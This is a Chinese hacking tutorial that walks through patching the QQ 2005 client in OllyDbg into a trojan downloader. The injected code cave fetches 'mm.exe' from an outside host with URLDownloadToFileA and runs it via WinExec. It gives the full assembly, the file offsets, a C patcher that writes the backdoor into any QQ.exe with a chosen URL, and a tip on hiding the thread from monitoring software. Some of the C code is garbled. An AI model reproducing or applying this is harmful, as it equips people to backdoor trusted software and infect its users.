|
1。思路篇平心而论,我不怎么喜欢那些全是操作的文章,从头到尾都是先这样,再那样。几乎学不到什么东西。比如讲某个木马,怎么反弹端口,怎么隐蔽,就是不给出思路的。实在不利于我们菜鸟的学习。牢骚几句,开始正题:首先,我们来手工把qq2005做成后门(必要的过程),然后在具体分析,思路是怎么横空出世的。因为编程实现不过是把手工的过程变成了自动的过程而已。这里又面临一个选择,是详细写出用ollydbg修改qq的详细过程,还是一笔带过呢?考虑到《逆》一文中的这个过程被一笔带过了(肯定带来的不少我等菜鸟的痛苦),所以我选择详细写出这个过程。这样才算手把手的教,是吧。由于我很讨厌抓图,所以一部分过程我就不抓图了。用ollydbg打开qq.exe,这时候程序会停在入口点,F2下个断点,为什么呢?因为要么要修改qq的入口代码。下断点后,很容易在找到这个位置,按ALT+B,双击断点,又回到入口了吧,是不是很方便。呵呵拖动CPU窗口的滚动条,到qq.exe的尾部,找到一大片的全是 db 0 的地方,这个可以理解为PE的空隙。我找到的地址是004D4D90,按着鼠标左键向下拖动,选中的部分是黄色的,按CTRL+E或者右键->二进制->编辑, 输入要下载的后门的地址:"http://hackor.51.net/mm.exe"(不包括引号), 回车,看到一堆不知道是什么的汇编代码吧,没有关系,CTRL+A分析一下,好看多了吧,如图1。同样的方法在004D4DCD(距离004D4D90比较远,是为了留出足够的空间来存放比较长的URL)添加"d:\ok.exe",如图2。继续添加如下汇编代码(为什么这样添加呢,随后给出):004D4DEB 60 pushad004D4DEC 6A 00 push 0004D4DEE . 6A 00 push 0004D4DF0 . 68 CD4D4D00 push QQ.004D4DCD ; ASCII "d:\ok.exe"004D4DF5 . 68 904D4D00 push QQ.004D4D90 ; ASCII "http://hackor.51.net/mm.exe"004D4DFA . 6A 00 push 0004D4DFC . E8 CAEBBC75 call urlmon.URLDownloadToFileA004D4E01 . 61 popad004D4E02 . 60 pushad004D4E03 . 6A 05 push 5 ; /ShowState = SW_SHOW004D4E05 . 68 CD4D4D00 push QQ.004D4DCD ; |CmdLine = "d:\ok.exe"004D4E0A . E8 26AF9777 call kernel32.WinExec ; WinExec004D4E0F . 61 popad004D4E10 . C3 retn004D4E11 00 db 00004D4E12 00 db 00004D4E13 > 60 pushad004D4E14 . 6A 00 push 0 ; /arg = NULL004D4E16 . 6A 00 push 0 ; |stksize = 0004D4E18 . 68 EB4D4D00 push QQ.004D4DEB ; |start = QQ.004D4DEB004D4E1D . E8 65307377 call MSVCRT._beginthread ; _beginthread004D4E22 . 61 popad004D4E23 . 55 push ebp004D4E24 . 8BEC mov ebp,esp004D4E26 . 6A FF push -1004D4E28 .^ E9 30FDF8FF jmp QQ.00464B5D按CTRL+A分析一下,看到了什么:004D4DEB . 60 6A 00 ascii "`j",0004D4DEB居然变成了这个,呵呵,用ollydbg的小技巧,选中这行,右键->分析->在下一次分析期间,将选择视为命令。呵呵,ok了吧。编辑的时候还会出现其它的不好看的东西,那是ollydbg分析错误导致的,需要手动调整,视为命令,字符等等(具体情形请自行分析)。现在来回答为什么这样添加的问题:004D4E18处压入的是004D4DEB(也就是URLDownloadToFileA的地址),这样当这个_beginthread启动的时候,会调用URLDownloadToFileA,去下载我们的mm.exe,紧接着执行WinExec函数,这样我们下载的mm.exe就被执行了,最后用retn返回。其中004D4E22到004D4E26是qq的入口代码,为了不影响qq的运行,我们还是要保存地。下面接着修改qq的入口代码,使之跳到004D4E13去执行我们的_beginthread。注意修改前请先保存,右键->复制到可执行文件,选择一个文件名就ok了。修改后(如图3):00464B58 Q> $ /E9 B6020700 jmp QQ.004D4E1300464B5D > |68 18104E00 push QQ.004E1018修改完成后,右键复制到可执行文件,全部修正。整个过程要注意堆栈平衡。上面的pushad和popad就是用来保持堆栈平衡的。2。具体编程实现:有了前面的过程,这个就简单了。用什么语言实现都一样,看你的个人爱好了。我用的c语言我们 的程序就是修改qq,把正常的qq.exe修改成上面这样的。那么要修改那些地方呢?有2个办法,用ollydbg同时开修改后的qq.exe和修改前的qq.exe,对比发现即可。但是不太方便。还可以使用Hex Workshop,我用的就是这个,它可以比较2个文件,下载地址:http://www.pediy.com/tools/Editors/Hex%20workshop/Hex%20workshop%204.23.zip安装完成后,打开Hex Workshop,CTRL+K,选择路径,如图4,okF6将自动定位到不同之处。偏移为:0x64b580xD4D900xd4dcd0xd4deb我们只需要编程修正以上地方的代码就可以了,还有一个问题是,我怎么知道要修正多少个字节呢?用Hex Workshop计算一下就知道了啊(2个地址相减就ok了),修正字节数并不要求特别准确。不影响程序的运行就可以了。整个程序如下(非常简单)://winxp sp1 + qq2005#include #include #include int main(int argc, char* argv[]){ FILE *fp; unsigned int i; int entryPoint[] = {233,182,2,7,0}; //入口要修正的字节 char *pDownURL = NULL; //指向下载URL的指针 char *pPathAndFileName = NULL; //指向文件路径和文件名的指针 int backDoor[] = { 96,106,0,106,0,104,205,77,77,0,104,144, 77,77,0,106,0,232,202,235,188,117, 97,96,106,5,104,205,77,77,0,232,38, 175,151,119,97,195,0,0,96,106,0,106, 0,104,235,77,77,0,232,101,48,115, 119,97,85,139,236,106,255,233,48, 253,248,255,0 }; if(argc != 3) { printf("ntt Make qq to be downloadern"); printf("nttttngaut All rights reserved.nn"); printf("Usage: %s n", argv[0]); printf("%s and qq.exe should at the same directoryn", argv[0]); printf("The os should be winxp sp1 and The qq version should be 2005n"); printf("pathAndFileName should like:nt d:\\mm.exe not d:\mm.exen"); return 1; } pDownURL = argv[1]; pPathAndFileName = argv[2]; printf("ntt Make qq to be downloadern"); printf("Cracking......n"); // 1. 打开文件qq.exe ,这个是正常的qq.exe if ((fp = fopen("QQ.exe", "r+"))==NULL) { printf("error!!! Can not open qq.exe!!!nn"); printf("Press any key to continuen"); getchar(); exit(0); } //2. set entry point fseek(fp, 0x64b58, SEEK_SET); for (i=0; i<5; i++) { fputc( (char)entryPoint, fp); } // 3. set downURL fseek(fp, 0x00D4D90, SEEK_SET); for (i=0; i { fputc(pDownURL, fp); } fputc(0, fp); //这里写入0,因为必须要以0结尾,下同 // 4. set pathAndFileName fseek(fp, 0xd4dcd, SEEK_SET); for (i=0; i { fputc(pPathAndFileName, fp); } fputc(0, fp); // 5. set backDoor code fseek(fp, 0xd4deb, SEEK_SET); for (i=0; i<66; i++) { fputc( (char)backDoor, fp); } fclose(fp); printf("nThanks for using, already cracked!!!n"); printf("nttttngaut All rights reserved.nn"); return 0;}上面的i用于控制要写入的字节数,并不需要非常精确,但是不要影响程序的执行。每次写入前都要用fseek函数移动文件指针到指定位置。用ollydbg看看程序的反汇编代码,你会发现backDoor就是我们后门关键部分对应的汇编代码,上面的程序有个小技巧,那就是如何得到entryPoint和backDoor数组的内容。而且可以看到它们都是int,使用时才被转化为char下面的代码用于得到entryPoint数组和backDoor数组的内容(个人方法很巧妙)://winxp sp1 + qq2005#include #include #include int main(int argc, char* argv[]){ FILE *fp; unsigned int i; // 1. 打开文件qq.exe, 注意这个qq是修改过的 if ((fp = fopen("QQ.exe", "r+"))==NULL) { printf("error!!! Can not open qq.exe!!!nn"); printf("Press any key to continuen"); getchar(); exit(0); } //get entryPoint code fseek(fp, 0x64b58, SEEK_SET); for (i=0; i<5; i++) { printf("%d,", fgetc(fp)); } printf("nn"); fseek(fp, 0xd4deb, SEEK_SET); for (i=0; i<67; i++) { printf("%d,", fgetc(fp)); } printf("nn"); fclose(fp); return 0;}运行结果如图5,真漂亮,呵呵。编程介绍完了。怎么样,还算简单吧。最后补充一点,我们创建线程还是逃不过某些软件的监视,那么我们该怎么解决呢。我们自己不创建就行了,借用别人的啊,比如flashget多线程下载,再说了,现在太多的软件都创建线程,只要不我们的代码挂上别人的线程就可以了,winxp sp2 和 flashget1.65测试成功,未做更多的测试,应该是可以的。我想这个方法可以叫做借尸还魂吧,呵呵,具体修改过程以及对应的代码分析就不写了,手指都麻了,好了,下次见。趁自己还年轻,多写点东西贡献给大家。也算是自己人生一大志愿。总体来说我写的东西都很简单,因为我就是一菜鸟,写不出什么高难度的东西来。 ^_^ |
